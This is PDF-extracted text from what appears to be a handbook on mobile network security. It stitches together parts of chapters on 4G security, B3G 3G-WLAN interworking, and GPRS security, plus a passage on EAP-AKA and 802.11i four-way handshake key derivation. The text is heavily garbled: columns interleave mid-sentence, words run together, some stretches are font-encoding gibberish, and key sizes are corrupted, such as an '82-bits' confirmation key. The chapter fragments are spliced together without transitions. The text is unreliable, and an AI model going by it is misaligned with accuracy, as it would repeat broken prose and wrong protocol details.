2G/3G security relies upon smart cards that rep- needs, the network could actually create a (virtual)
resent the network counterparts for authentication SPN corresponding exactly to users’ expectations
and per packet encryption. The actual algorithms in the chosen access network technology. Different
and methods are hidden and implemented within virtualization techniques can be used in that scope,
the closed card; they are always run against the from the previous security virtualization examples
home provider, who also acts as smart card issuer. to infrastructure virtualization techniques such as
In that manner, every home provider has a free VLAN (IEEE 802.1q) or MPLS (Rosen, Viswa-
choiceofstandardorbettermechanisms to&fulfill
nathan, Callon, 2001). This approach could
his/her particular security requirements. The whole ultimately provide users with their own virtual
transport and signaling infrastructure, including environments, inaccessible by others, and, at the
the visited network provider, is independent of same time, render the actual physical SPN and
that implementation. It is thus feasible to enforce its management subsystems inaccessible by the
different authentication and per packet security users. Hence, this approach could come handy to
on a per user basis. solve parts of the problem with the heterogeneity
The usage of 802.1X/EAP protocol in 802.11i of the ANs.
for access control provides a generic authentication On the terminal, adaptation can help bridge the
function: by specifying how to control, transport, differences in the available implementations of the
and evaluate user authentication frames instead of access network security. By inspecting the available
specifying how to authenticate users, this standard (active) interfaces, the really activated measures,
is now open to authentication method choices. The and taking into account the available information on
deployed infrastructure is freed from any authenti- recently discovered low level vulnerabilities (user
cation logic; only the central authentication server input, secure home network signaling channel, etc.),
has to implement the actual mechanism, such as, the terminal implementations could preprocess
for example, EAP-TLS specifying TLS (Dierks thesentdata,soitstillfulfillstheoverallse
& Allen, 1999) transport over EAP. That enables policyinspitetheinsufficiencies.
an authentication method choice on a per-session,
per-user basis. standardization
Virtualization is thus a strong design principle
for open systems. It thus seems very interesting for Since the 4G does not yet exist, standardization
4G security. Nevertheless, even with virtualiza- could be used at these early stages to build a good

Security in 4G
base for future 4G security. Basically, such stan- More specifically, in this chapter, we present
dardizationeffortsshouldapplytonew thedefinitions
development process from 1G to 4G discussing
and adapt the existing technologies, so these could telecommunications landscape changes and time
be used in the future 4G landscape. scales. We then introduce the current state of the
In 4G, standardization is one of the central 4G discussion and present our vision of 4G as a
discussions. Not everything can be standard, technology-opportunistic, user-centric mobile
since otherwise we migrate back from the tech- services system built of multi-interface terminals
nology-opportunistic vision to a monolithic one- and heterogeneous ANs, bound by a decent man-
technology-vision. On the other hand, without any agement subsystem. Given that 4G shape, conform
standards, hardly any communication is possible. to the main trend in the current 4G research, we
The compromise between what we standardize in introduce main system interfaces, its links and
the 4G scope and what we leave to the respective entities to discuss its vulnerabilities.
technology is the most critical design decision. We then introduce 4G security requirements,
The standardization should respect the three justifying the special character of and insisting on
introduced interfaces, differentiating user-network, the network access phase. Finally, we propose sev-
provider-provider, and internal SPN interfaces eral high level approaches to 4G security, including
(mainly management plane). virtualization, adaptation and standardization.
Virtualization plays an important role for 4G
standardization. We can learn from the former
experiences that specifying what and how sepa- rEfErEncEs
ratelyismoreexible. fl Toprovideadaptation,we
need at least a common signaling standard. This 3rd Generation Partnership Project (3GGP) TS
represents a seemingly viable alternative approach 33.102 Release 99. (n.d.). GPP:
3 Technicalspecifi -
to the current pure overlay solutions such as All- cation group (TSG), 3G security: Security architec-
IP. We could standardize a common 4G signaling ture. Sophia Antipolis Cedex, France: Author.
protocol,includingvirtualdefinitionsfornetwork
access and data protection phases, and then use the Al-Muhtadi, I., Mickunas, D., & Campbell, R.
access technologies as is, without any additional 0April)
2, ( A. lightweightreconfigurable-secu
changes, as a pure data transport. rity mechanism for 3G/4G mobile devices. IEEE
WirelessCommunications, 9
(2), 60-65.
Bahl, P., Balachandran, A., & Venkatachary, S.
conclusIon (2001, June). Secure wireless Internet access in
public places. In Proceedings of the IEEE Inter-
The4Greflectionsstartedaboutare 1 02 - notnational Conference on Communications (IEEE
yet mature enough to present a sound overview of ICC 2001), Finland.
the 4G security. At the current state, there is no
common 4G vision and what will eventually be Becchetti, L., Priscoli, F. D., Inzerillli, T., Mähönen,
called 4G is an open question. P., & Muñoz, L. (2001, August). Enhancing IP
Independent of that, we believe that the tech- service provision over heterogeneous wireless
nology-opportunistic system as the one presented networks: A path towards 4G. IEEE Communica-
in this chapter will eventually be built. That is the tionsMagazine, 93 74-81.
(8),
reason why the new security problems related to Blake, S., Black, D., Carlson, M., Davies, E., Wang,
the high system heterogeneity and the new usage Z., & Weiss, W. (1998, June). An architecture for
scenarios and presented in this chapter seem to differentiated services (RFC 2475). Retrieved from
be of major importance for the understanding of http://www.ietf.org/rfc/rfc2475.txt
the vulnerabilities and design of future telecom
systems.

Security in 4G
Braden, R., Clark, D., & Shenker, S. (1994, June). access infrastructure for supporting mobile con-
Integrated services in the Internet architecture: An text-aware IPv6 applications. In Proceedings of the
overview (RFC 1633). Retrieved from http://tools. ACM 1st Workshop on Wireless Mobile Internet,
ietf.org/html/rfc1633 Rome, Italy (pp. 11-18).
Bria, A., Gessler, F., Queseth, O., Stridh, R., Ginzboorg, P. (2000, November). Seven comments
Unbehaun, M., & Wu, J. (2001, December). 4th- on charging and billing. Communications of the
generation wireless infrastructures: Scenarios and ACM, 43(11), 89-92.
research challenges. IEEE Personal Communica-
Global System for Mobile Communications (GSM)
tions, 8(6), 25-31.
11.11 (n.d.). Digital cellular telecommunication
Case, J. D., Fedor, M., Schoffstall, M. L., & Davin, J. system(Phasespecification
,) +2 ofthesubscriber
(1990, May). Simple network management protocol identity module—Mobile equipment (SIM-ME)
(SNMP) (RFC 1157). Retrieved from http://www. interface. Author.
Global System for Mobile Communications (GSM)
Code Division Multiple Access (CDMA) Develop- Association. (n.d.). 3GSM platform. Retrieved from
ment Group. (n.d.). Technology: 3G—cdma2000. http://www.gsmworld.com/technology/3g/index.
Retrieved from http://www.cdg.org/technology/3g. shtml
asp
Gupta, V., & Gupta, S. (2002, March). KSSL:
Dell’Uomo, L., & Scarrone, E. (2001, September). Experiments in wireless Internet security. In
The mobility management and authentication/ Proceedings of the Wireless Communications and
authorization mechanisms in mobile networks Networking Conference (pp. 860-864).
beyond 3G. IEEE Personal, Indoor and Mobile
Hecker, A. (2005, March 16). On logical network
Radio Communications, 1, C44-C48.
access control and the associated user and net-
Dierks, T., & Allen, C. (1999, June). The TLS work management in future heterogeneous 4G
protocol version 1.0 (RFC 2246). Retrieved from wireless systems. Computer Science and Networ-
http://www.ietf.org/rfc/rfc2246.txt ing Department, Ecole Nationale Supérieure des
Télécommunications(ENST),Paris,France.
Durham, D. (Ed.), Boyle, J., Cohen, R., Herzog,
S., Rajan, R. & Sastry, A. (2000, January). The Hecker, A., & Labiod, H. (2004). Pre-authenticated
COPS (common open policy service) protocol signaling in wireless LANs using 802.1X access
(RFC 2748). Retrieved from http://www.rfc-editor. control. In Proceedings of the IEEE GLOBECOM
org/rfc/rfc2748.txt 2004, Dallas, TX.
Emmerich, W. (2000, June). Engineering distrib- IEEE Draft 802.11e. (2003, February). Draft supple-
uted objects. John Wiley & Sons. ment to standard for telecommunications and infor-
mation exchange between systems—LAN/MAN
Evans, B. G., & Baughan, K. (2000, December).
specificrequirements—PartWireless :1 medium
4G visions. IEEE Electronics & Communications
access control (MAC) and physical layer (PHY)
Engineering Journal, 12(6), 293-303.
specifications:Mediumaccesscontrol - (MAC)en
Forsber, D., Ohba, Y., Pati, B., Tschofenig, H., & hancementsforqualityofserviceQoS) ( .Author.
Yegin, A. (2003, March). Protocol for carrying
IEEE Draft 802.11i. (n.d.). Draft supplement to
authentication for network access. IETF PANA
IEEE Std. 1 Part
2. 8 0 : 1Specifications for en -
Working Group Draft, work in progress. Internet
hanced security. Author.
Engineering Task Force.
IEEE Standard 802.11F. (2003, July). Trial-use
Friday, A., Wu, M., Schmid, S., Finney, J., Cheverst,
recommended practice for multi-vendor access
K., & Davies, N. (2001, July). A wireless public

Security in 4G
point interoperability via an inter-access point bile Communication Technologies (pp. 346-350).
protocol across distribution systems supporting
Raychaudhuri, D. (2002, September). 4G network
IEEE 802.11 operation. Author.
architectures: WLAN hot-spots, infostations and
IEEE Standard 802.1X. (2001, June). Port-based beyond... In IEEE PIMRC 2002 Keynote Talk,
network access control. Author. Lisbon, Portugal.
International Telecommunication Union-Radio Rosen, E., Viswanathan, A., & Callon, R. (2001,
Communication Sector (ITU-R) World Radio- January). Multiprotocol label switching architec-
communication Conference, Retrieved from ture (RFC 3031). Retrieved from http://tools.ietf.
http:www.
/ itu.int/ITU-R/index.asp?category=co org/html/rfc3031
nferences&link=wrc&lang=en
Schulzrinne, H., & Wedlund, E. (2000, July). Ap-
Kellerer, W., Vögel, H.-J., & Steinberg, K.-E. (2002, plication-layer mobility using SIP. ACM Mobile
March). A communication gateway for infrastruc- Computing and Communications Review, 4(3),
ture-independent 4G wireless access. IEEE Com- 47-57.
munications Magazine, 40(3), 126-131.
Tsao, S.-L., & Lin, C.-C. (2002, September).
Kent, S., & Atkinson, R. (1998, November). Design and evaluation of UMTS-WLAN inter-
Security architecture for the Internet protocol working strategies. In Proceedings of the IEEE
(RFC 2401). Retrieved from http://www.ietf.org/ 6th
5 Vehicular Technology Conference (VTC),
rfc/rfc2401.txt Vancouver, Canada.
Misra, A., Das, S., Dutta, A., McAuley, A., & Das, Van Damme, E. (2002, May 4-5). The European
S. K. (2002, March). IDMP-based fast handoffs UMTS-auctions. European Economic Review,
and paging in IP-based 4G mobile networks. IEEE 6,846-858.
4
Communications Magazine, 40(3), 138-145.
Varshney, U., & Jain, R. (2001, June). Issues in
Nakhjiri, M., Perkins, C., & Koodli, R. (2004, emerging 4G wireless networks. IEEE Computer,
August). Context transfer protocol. In J. Loughney 34(6), 94-96.
(Ed.), Approved IETF draft, work in progress.
Yahalom, R., Klein, B., & Beth, Th. (1993, May).
Internet Engineering Task Force.
Trust relationships in secure systems—A distrib-
Otsu, T., Okajima, I., Umeda, N., & Yamao, Y. uted authentication perspective. In Proceedings of
(2001, October). Network architecture for mobile the IEEE ComSoc Symposium on Research in Se-
communications systems beyond IMT-2000. curity and Privacy, Oakland, CA (pp. 150-164).
IEEE Personal Communications Magazine, 8(5),
Yumiba, H., Imai, K., & Yabusaki, M. (2001, Oc-
31-37.
tober). IP-based IMT network platform. IEEE Per-
Peirce, M. (2000, October). Multi-party electronic sonal Communications Magazine, 8(5), 18-23.
payments for mobile communications. Unpublished
Zhang, T., & Agrawal, P., & Chen, J.-C. (2001,
PhD thesis, Department of Computer Science,
October). IP-based base stations and soft handoff
University of Dublin, Trinity College.
in all-IP wireless networks. IEEE Personal Com-
Pereira, J. M. (2000, September). Fourth generation: munications Magazine, 8(5), 24-30.
Now, it is personal! In Proceedings of the IEEE
Zhang, J., Li, J., Weinstein, S., & Tu, N. (2002,
International Symposium on Personal, Indoor and
July). Virtual operator based AAA in wireless
Mobile Radio Communications (PIMRC) London
LAN hot spots with ad-hoc networking support.
(Vol. 2, 1009-1016).
ACM Mobile Computing and Communications
Raivio, Y. (2001, March). 4G—Hype or reality Review,6(3), 10-21.
(Conference Publication No. 477). In IEE 3G Mo-

Security in 4G
5
EndnotEs International Mobile Telecommunications
2000, ITU’s common name for different 3G
1
Since users are the main focus of our variants.
6
work, we prefer this term to the synonymic Note that generally these two problems are
not equivalent. However, in our 4G vision we
operator, which refers to the infrastruc-
suppose that SPNs are organized as integrated
ture. transport and services networks run by the
2
This is not limiting since any legal body same authority. In that view, the difference
can have multiple user assignments. between the two is of a very technical nature;
3
This is used consistently to the original it is merely limited to and by the internal SPN
definition given in Zhang et al. (20). organization.
However, since in this special case no in- 7 Although the lower layer address and the
frastructure exists, the actually “operated” user identity are two completely different
entity is the user. This term is thus also identifiers, one initial passive networ
consistent with our strictly user-oriented observation in the proximity of a victim
view. allows an establishment of a direct rela-
4
That underlines the fact that our model mainly tionship.
requires the service contract as a means for
areliableuseridentification.Indeed,without
any pre-established trust, no reliable billing
is possible.

Chapter XIX
Security Architectures for B3G
Mobile Networks
Christoforos Ntantogian
University of Athens, Greece
Christos Xenakis
University of Piraeus, Greece
AbstrAct
The integration of heterogeneous mobile/wireless networks using an IP-based core network materializes
the beyond third generation (B3G) mobile networks. Along with a variety of new perspectives, the new
network model raises new security concerns, mainly, because of the complexity of the deployed archi-
tecture and the heterogeneity of the employed technologies. In this chapter, we examine and analyze the
security architectures and the related security protocols, which are employed in B3G networks focusing
on their functionality and the supported security services. The objectives of these protocols are to protect
the involved parties and the data exchanged among them. To achieve these, they employ mechanisms that
providemutualauthenticationaswellasensuretheconfidentialityandintegrityo
overthewirelessinterfaceandspecificpartsofthecorenetwork.Finally,basedonthe
security mechanisms, we present a comparison of them that aims at highlighting the deployment advan-
tagesofeachoneandclassifiesthelatterinterms ,(2)mobility,
of:(1)security
and(3)reliability.
IntroductIon supporting ubiquitous computing. Currently, the

network architecture (3rd Generation Partnership
The evolution and successful deployment of wire- Project [3GPP] TS 23.234, 2006) that integrates
less LANs (WLANs) worldwide has yielded a de- G3 andWLANspecifiestwodifferentaccess - sce
mand to integrate them with third generation (3G) narios: (1) the WLAN Direct IP Access and (2) the
mobile networks. The key goal of this integration WLAN 3GPP IP Access.Thefirstscenarioprovides
is to develop heterogeneous mobile data networks, to a user an IP connection to the public Internet
named as beyond 3G (B3G) networks, capable of or to an intranet via the WLAN access network
Security Architectures for B3G Mobile Networks
(WLAN-AN), while the second allows a user to Access and the 3GPP IP Access scenarios. The
connect to packet switch (PS) based services (such third section elaborates on the B3G security archi-
as wireless application protocol [WAP], mobile tectures analyzing the related security protocols
multimedia services [MMS], location-based ser- for each scenario. The fourth section compares the
vices [LBS] etc.) or to the public Internet, through security architectures and consequently, the two
the 3G public land mobile network (PLMN). accessscenarios.Finally,thefifthsectioncontain
Along with a variety of new perspectives, the the conclusions.
new network model (3G-WLAN) raises new secu-
rity concerns, mainly, because of the complexity
of the deployed architecture and the heterogeneity bAckground
of the employed technologies. In addition, new
security vulnerabilities are emerging, which might
the b3g network Architecture
be exploited by adversaries to perform malicious
actions that result in fraud attacks, inappropriate
As shown in Figure 1, the B3G network archi-
resource management, and loss of revenue. Thus,
tecture includes three individual networks: (I)
the proper design and a comprehensive evaluation
the WLAN-AN, (II) the visited 3G PLMN, and
of the security mechanisms used in the 3G-WLAN
(III) the home 3G PLMN. Note that Figure 1 il-
network architecture is of vital importance for the
lustrates the architecture for a general case where
effective integration of the different technologies
the WLAN is not directly connected to the user’s
in a secure manner.
home 3G PLMN. The WLAN-AN includes the
In this chapter we examine and analyze the
wireless access points (APs), the network access
security architectures and the related security
servers (NAS), the authentication, authorization,
protocols, which are employed in B3G, focusing
accounting (AAA) proxy (Laat, Gross, Gommans,
on their functionality and the supported security
Vollbrecht, & Spence, 2000), and the WLAN-ac-
services for both WLAN Direct IP Access and
cess gateway (WLAN-AG). The wireless APs
3GPP IP Access scenarios. Each access scenario
provide connectivity to mobile users and act like
(i.e., WLAN Direct Access and WLAN 3GPP IP
AAA clients, which communicate with an AAA
Access)inB3Gnetworksincorporatesaspecific
proxy via the Diameter (Calhoun, Loughney, Gutt-
security architecture, which aims at protecting the
man, Zorn, & Arkko, 2003) or the Radius (Rigney,
involved parties (i.e., the mobile users, the WLAN,
Rubens, Simpson, & Willens, 1997) protocol to
and the 3G network) and the data exchanged
convey user subscription and authentication infor-
among them. We elaborate on the various secu-
mation. The AAA proxy relays AAA information
rity protocols of the B3G security architectures
between the WLAN and the home 3G PLMN. The
that provide mutual authentication (i.e., user and
NAS allows only legitimate users to have access
networkauthentication)aswellasconfidentiality
tothepublicInternet,andfinally,theWLAN-AG
and integrity services to the data transferred over
is a gateway to 3G PLMN networks. It is assumed
the air interface of the deployed WLANs and
that WLAN is based on the IEEE 802.11 standard
specificpartsofthecorenetwork.Finally,based
(IEEE std 802.11, 1999).
on the analysis of the two access scenarios and the
On the other hand, the visited 3G PLMN in-
security architecture that each one employs, we
cludes an AAA proxy that forwards AAA informa-
present a comparison of them. This comparison
tion to the AAA server (located in the home 3G
aims at highlighting the deployment advantages
PLMN), and a wireless access gateway (WAG),
of each scenario and classifying them in terms of:
which is a data gateway that routes users’ data to
(1) security, (2) mobility, and (3) reliability.
the home 3G PLMN. On the other hand, the home
The rest of this chapter is organized as fol-
3G PLMN includes the AAA server, the packed
lows. The next section outlines the B3G network
data gateway (PDG) and the core network elements
architectures and presents the WLAN Direct IP

of the universal mobile telecommunications system public Internet or to an intranet via the WLAN-AN.
(UMTS), such as the home subscriber service (HSS) In this scenario both the user and the network are
or the home location register (HLR), the Gateway authenticated to each other using the extensible
GPRS support node (GGSN) and the Serving GPRS authentication protocol method for GSM sub-
support node (SGSN). The AAA server retrieves scriber identity modules (EAP-SIM) (Haverinen
authentication information from the HSS/HLR and & Saloway, 2006) or the Extensible Authentica-
validates authentication credentials provided by tion Protocol-Authentication and Key Agreement
XVHUV7KH3’*URXWHVXVHUGDWDWUDI¿FEHWZHHQ (EAP-AKA) (Arkko & Haverinen, 2006) protocol.
a user and an external packet data network, which 0RUHRYHULQWKLVVFHQDULRWKHFRQ¿GHQWLDOLW\DQ
is selected based on the 3G PS-services requested integrity of users data transferred over the air inter-
E\WKHXVHU7KHODWWHULGHQWL¿HVWKHVHVHUYLFHVE\ face is ensured by the 802.11i security framework
means of a WLAN-access point name (W-APN), (IEEE std 802.11i, 2004). On the other hand, the
which represents a reference point to the external WLAN 3GPP IP Access scenario allows a WLAN
IP network that supports the PS services to be user to connect to the PS services (like WAP, MMS,
accessed by the user. LBS, etc.) or to the public Internet through the 3G
As mentioned previously, the integrated ar- PLMN. In this scenario, the user is authenticated
FKLWHFWXUHRI%*QHWZRUNVVSHFL¿HVWZRGLIIHUHQW to the 3G PLMN using the EAP-SIM or alterna-
network access scenarios: (1) the WLAN direct IP tively the EAP-AKA protocol encapsulated within
access and (2) the WLAN 3GPP IP Access. The IKEv2 (Kaufman, 2005) messages. The execution
¿UVWVFHQDULRSURYLGHVWRDXVHUFRQQHFWLRQWRWKH of IKEv2 is also used for the establishment of an
Figure 1. The B3G network architecture
Table 1. 3G-WLAN interworking security mechanisms

Security WLAN Direct IP Access 3GPP IP Access
Authentication EAP-SIM or EAP-AKA IKEv2 with EAP-SIM or EAP-AKA
Data protection CCMP or TKIP protocol IPsec based VPN tunnel using the ESP protocol
&&03 &RXQWHU0RGH&%&0DF3URWRFRO7.,3 7HPSRUDO.H\,QWHJULW\3URWRFRO
299
Access Security in UMTS and IMS
kEy tErMs IP multimedia subsystem (IMS): IMS is the

component to support multimedia services in 3G
Access security: Access security is the mecha- system.
nism that provides mobile users with secure access
Third generation (3G): 3G wireless com-
to wireless services and protects against attacks
munication systems is standardized to support
on the radio access interface.
multimedia services with high data rate.
General Packet Radio Service (GPRS): GPRS
Universal mobile telecommunications system
is regarded as 2.5 generation mobile system. It
(UMTS): UMTS is one of the third-generation
provides mobile data service to GSM users.
wireless communication systems.
0

Chapter XXII
Security in 2.5G Mobile Systems
Christos Xenakis
AbstrAct
The global system for mobile communications (GSM) is the most popular standard that implements sec-
ond generation (2G) cellular systems. 2G systems combined with general packet radio services (GPRS)
areoftendescribedas2.5G,thatis,atechnologybetweenthe2Gandthirdgeneration(3G)ofmob
systems. GPRS is a service that provides packet radio access for GSM users. This chapter presents the
securityarchitectureemployedin2.5GmobilesystemsfocusingonGPRS.Morespecifically,these
measures applied to protect the mobile users, the radio access network, the fixed part
and the related data of GPRS are presented and analyzed in detail. This analysis reveals the security
weaknesses of the applied measures that may lead to the realization of security attacks by adversaries.
These attacks threaten network operation and data transfer through it, compromising end users and
networksecurity.Todefeattheidentifiedrisks,currentresearchactivitiesontheG
a set of security improvements to the existing GPRS security architecture.
IntroductIon tems, consists of an overlay network onto the GSM

network. In the wireless part, the GPRS technology
The global system for mobile communications, reserves radio resources only when there is data
(GSM) is the most popular standard that imple- to be sent, thus, ensuring the optimized utilization
ments second generation (2G) cellular systems. ofradioresources.Thefixedpartofthenetwork
2G systems combined with general packet radio employs the IP technology and is connected to
services (GPRS) (3GPP TS 03.6, 2002) are often the public Internet. Taking advantage of these
described as 2.5G, that is, a technology between features, GPRS enables the provision of a variety
the 2G and third generation (3G) of mobile systems. of packet-oriented multimedia applications and
GPRS is a service that provides packet radio access services to mobile users, realizing the concept of
for GSM users. The GPRS network architecture, the mobile Internet.
which constitutes a migration step toward 3G sys-
For the successful implementation of the new describesbrieflytheGPRSnetworkarchitecture.

emerging applications and services over GPRS, The third section presents the security architecture
security is considered as a vital factor. This is be- applied to GPRS and the fourth section analyzes its
cause of the fact that wireless access is inherently securityweaknesses.Thefifthsectionelaborates
less secure and the radio transmission is by nature the current research activities on the GPRS security
more susceptible to eavesdropping and fraud in and the sixth section presents the conclusions.
use than wire-line transmission. In addition, users’
mobility and the universal access to the network
imply higher security risks compared to those gPrs nEtwork ArcHItEcturE
encountered in fixed networks. In order to meet
securityobjectives,GPRSusesaspecific security
The network architecture of GPRS (3GPP TS 03.6,
architecture, which aims at protecting the network 2002) is presented in Figure 1. A GPRS user owns
against unauthorized access and the privacy of a mobile station (MS) that provides access to the
users. This architecture is mainly based on the wireless network. From the network side, the base
security measures applied in GSM, since the GPRS station subsystem (BSS) is a network part that is
system is built on the GSM infrastructure. responsible for the control of the radio path. BSS
Based on the aforementioned consideration, consists of two types of nodes: the base station
the majority of the existing literature on security controller (BSC) and the base transceiver station
in 2.5G systems refers to GSM (Mitchell, 2001; (BTS). BTS is responsible for the radio coverage
Pagliusi, 2002). However, GPRS differs from of a given geographical area, while BSC maintains
GSM in certain operational and service points, radio connections towards MSs and terrestrial
which require a different security analysis. This connectionstowardsthefixedpartofthenetwor
is because GPRS is based on IP, which is an open (core network).
and wide deployed technology that presents many The GPRS core network (CN) uses the network
vulnerable points. Similarly to IP networks, intrud- elements of GSM such as the home location regis-
ers to the GPRS system may attempt to breach ter (HLR), the visitor location register (VLR), the
the confidentiality, integrity, or availability, or (AuC) and the equipment
authentication centre
otherwise attempt to abuse the system in order to identity register (EIR). HLR is a database used
compromise services, defraud users, or any part for the management of permanent data of mobile
of it. Thus, the GPRS system is more exposed to users. VLR is a database of the service area visited
intruders compared to GSM. by an MS and contains all the related information
This chapter presents the security architecture required for the MS service handling. AuC main-
employed in 2.5G mobile systems focusing on tains security information related to subscribers
GPRS. More specifically, the security measures identity, while EIR maintains information related
applied to protect the mobile users, the radio ac- to mobile equipments’ identity. Finally, the mobile
cessnetwork,thefixedpartofthenetwork, and
service the centre (MSC) is a network ele-
switching
related data of GPRS are presented and analyzed ment responsible for circuit-switched services (e.g.,
in details. This analysis reveals the security weak- voice call) (3GPP TS 03.6, 2002).
nesses of the applied measures that may lead to As presented previously, GPRS reuses the ma-
the realization of security attacks by adversaries. jority of the GSM network infrastructure. However,
These attacks threaten network operation and data in order to build a packet-oriented mobile network
transfer through it, compromising end users and some new network elements (nodes) are required,
network security. To defeat the identified whichhandle risks, packet-basedtraffic.Thenewclass
current research activities on the GPRS security of nodes, called GPRS support nodes (GSN), is
propose a set of security improvements to the ex- responsible for the delivery and routing of data
isting GPRS security architecture. The rest of this packets between an MS and an external packet
chapter is organized as follows. The next section datanetwork(PDN)More . specifically, a
serving

Figure 1. GPRS network architecture
cn
gi
Auc
ggsn
Pstn H
gc
d Hlr gr gn
g Msc
f EIr gf sgsn gp
E vlr
A gb
bss
bsc
Abis Abis
bts bts
um
Ms
Auc: Authentication Center ggsn: Gateway GPRS Support Node

bts: Base Transceiver Station Hlr: Home Location Register
bsc: Base Station Controller Ms: Mobile Station
bss: Base Station Subsystem Msc: Mobile Switching Center
cn : Core Network sgsn: Serving GPRS Support Node
EIr: Equipment Identity Register vlr: Visited Location Register
GSN (SGSN) is responsible for the delivery of data gPrs sEcurIty ArcHItEcturE
packets from, and to, an MS within its service area.
Its tasks include packet routing and transfer, mo- In order to meet security objectives, GPRS em-
bility management, logical link management, and ploys a set of security mechanisms that constitutes
authentication and charging functions. A gateway the GPRS security architecture. Most of these
GSN (GGSN) acts as an interface between the mechanisms have been originally designed for
GPRS backbone and an external PDN. It converts GSM, but they have been modified to adapt to
the GPRS packets coming from the SGSN into the packet-oriented traffic nature and the GPRS
the appropriate packet data protocol (PDP) format network components. The GPRS security archi-
(e.g., IP), and forwards them to the corresponding tecture, mainly, aims at two goals: (1) to protect
PDN. Similar is the functionality of GGSN in the the network against unauthorized access, and (2)
opposite direction. The communication between to protect the privacy of users. It includes the fol-
GSNs (i.e., SGSN and GGSN) is based on IP tunnels lowing components (GSM 03.20, 1999):
through the use of the GPRS tunneling protocol
(GTP) (3GPP TS 09.60, 2002). • Subscriber identity module (SIM)
• Subscriberidentityconfidentiality
• Subscriber identity authentication

MACuser=HMAC-SHA1K_auth(EAP-Response/AKA/ of the CCMP protocol. Since the TKIP protocol

Challenge(n*XRES)), (6) is considered to be a short term solution and it is
merely a software enhancement of WEP, we do
• Upon receiving the EAP-Response/AKA- not elaborate further on it.
ChallengemessagetheAAAserververifies
the received MACuser value and checks if Four-way and group key handshakes. After
the received user’s response to the challenge a successful completion of the authentication
(XRES) matches with the response (i.e., procedure of EAP-SIM or EAP-AKA, the user
SRES) received from the HLR/HSS. and the AP perform the four-way and group key
• If all these checks are successful, the AAA handshakes of 802.11i (IEEE std 802.11i, 2004) in
server sends an EAP-Success message along order to generate the session keys. In the four-way
with the key MSK to the wireless AP. The handshake, both the user and the AP derive the
latter stores the key and forwards the EAP- pairwise transient key (PTK) from the MSK key
Success message to the user. that was generated in EAP-SIM or EAP-AKA to
protect the four-way handshake messages and the
Finalizing the EAP-AKA protocol, both the user unicast messages. In addition, the AP delivers to
and the network have been authenticated to each the user a group temporal key (GTK), which is used
other, and the user and the wireless AP share the to protect broadcast/multicast messages. The GTK
key MSK, which is used in the security framework key is generated from the group master key (GMK),
of 802.11i for generating the session encryption which is stored and maintained in the AP. The group
keys, as described in the next section. key handshake is executed whenever the AP wants
to deliver a new GTK key to the connected users.
Data Protection-0.i Standard Note that all the messages exchanged during the
four-way and the group key handshakes comply
As mentioned previously, 802.11i is employed with the EAPOL-Key message format (IEEE std
to provide confidentiality and integrity 802.1X, services
2004).
to users’ data conveyed over the radio interface As its name implies, the 802.11i four-way
of the deployed WLAN in the WLAN Direct IP handshake consists of a total of four EAPOL-Key
Access scenario. The 802.11i standard was devel- messages, which are analyzed next. Each of these
oped to enhance the security services provided in messages includes key information (key_info
WLANs. Its design was motivated by the fact that payload), such as key identity, key replay counter,
the wired equivalent privacy (WEP) protocol, due and so forth.
to its security aws, fl could not fulfil the security
requirements of WLANs (Borisov, Goldberg, • At the beginning of the four-way handshake,
& Wagner, 2001). The design goal of 802.11i is the AP sends an EAPOL-Key message to the
twofold: (1) to provide session key management user that includes the Anonce, which is a random
by specifying a four-way handshake and group number used as input for the generation of
key handshake procedures, and (2) to enhance the the PTK key, as described later on.
confidentialityandintegrityservicesprovided • Upon receivingto the first EAPOL-Key mes -
users’ data by incorporating two security protocols sage, the user generates a new random num-
(1) the counter-mode/CBC-MAC protocol (CCMP), ber called Snonce. Then, he/she calculates the
which employs the advanced encryption standard 384-bits PTKkeyusingthefirst56bits 2 of
(AES), and (2) the temporal key integrity protocol the MSK key (MSK was generated during
(TKIP), which uses the same encryption (RC4) with the authentication procedure of EAP-SIM or
the WEP protocol. In the following, we analyze EAP-AKA as described in the Authentication
the four-way and group key handshake procedures in the WLAN Direct AP Access section), the
of 802.11i and we present the functional details
0
Figure 4. The CCMP protocol key hierarchy
MSK of EAP-SIM or
GMK
EAP-AKA
prf
prf
PTK
bits
EAPOL KCK EAPOL KEK TK GTK

bits bits bits bits
user’s address, the AP’s address, the Snonce Information Element (RSN IE) payload,
value, and the Anonce value, as follows: which denotes the set of authentication and
cipher algorithms that the user supports, and
PTK=prf (MSK, “Pairwise key expansion”, Min(AP a message integrity code (MIC), which is a
address, user’s address) | Max(AP address, cryptographic digest used to provide integ-
user’s address) | Min(Anonce , Snonce) | Max(Anonce rity services to the messages of the four-way
, Snonce)), handshake and it is computed as follows:
(7)
MIC= HASHKCK (EAPOL-Key message), (8)
where prf is a pseudo random function, “Pair-
wise key expansion” is a set of characters, and, where HASHKCK denotes a hash function (i.e.,
finally, the Min and Max functions provide the or HMAC-SHA-128) that uses the
HMAC-MD5
minimum and maximum value, respectively, be- KCK key to generate the cryptographic hash value
tween two inputs. In the sequel, the generated PTK over the second EAPOL-Key message.
key is partitioned to derive three other keys: (1) a • Upon receiving this message, the AP calcu-
82-bits
1 keyconfirmationkey ( that provides
KCK) lates the key PTK and the related keys (i.e.,
integrity services to EAPOL-Key messages, (2) a KCK, KEK, and TK keys), (the same with the
128-bits key encryption key (KEK) used to encrypt user),and,then,verifiestheintegrityofthe
the GTK key as described next, and, (3) a 128-bits message (producing the MIC value). Next,
temporal key (TK) used for user’s data encryption it generates the 128-bits GTK key from the
(see Figure 4). GMK key as follows:
• After the calculation of these keys, the user
forwards to the AP the second EAPOL-Key GTK=prf(GMK, “Group key expansion”| AP ad-
message (step 2-Figure 5) that includes the dress| Gnonce), (9)
Snonce, the user’s Robust Security Network
0
where Gnonce is a random number generated user decrypts the GTK key using the KEK key
from the AP to derive the GTK key and sends to the AP the last message of the
• In the sequel, the AP replies to the user by four-way handshake (step 4), which includes
sending the third EAPOL-Key message (step an MIC payload over the fourth EAPOL-Key
3), which includes the Anonce value (the same message, to acknowledge to the AP that he/she
withthefirstEAPOL-Keymessage)an , MIC has installed the PTK key and the related keys
over the third EAPOL-Key message, the AP’s (i.e., KEK, KCK, and TK keys), as well as the
RSN IE, and the GTK key, which is used to GTK key.
protect the broadcast/multicast messages and • Once the AP receives the fourth EAPOL-Key
it is conveyed encrypted using the KEK key, message,itverifiestheMICaspreviously.If
as follows: this final check is successful, the four-way
handshake is completed successfully, and
Encrypted GTK= ENCKEK (GTK), (10) both the user and the AP share: (1) the TK
key to encrypt/decrypt unicast messages,
where ENCKEK denotes the encryption al- and (2) the GTK key to encrypt/decrypt
gorithm (i.e., AES or RC4), which uses the broadcast/multicast messages.
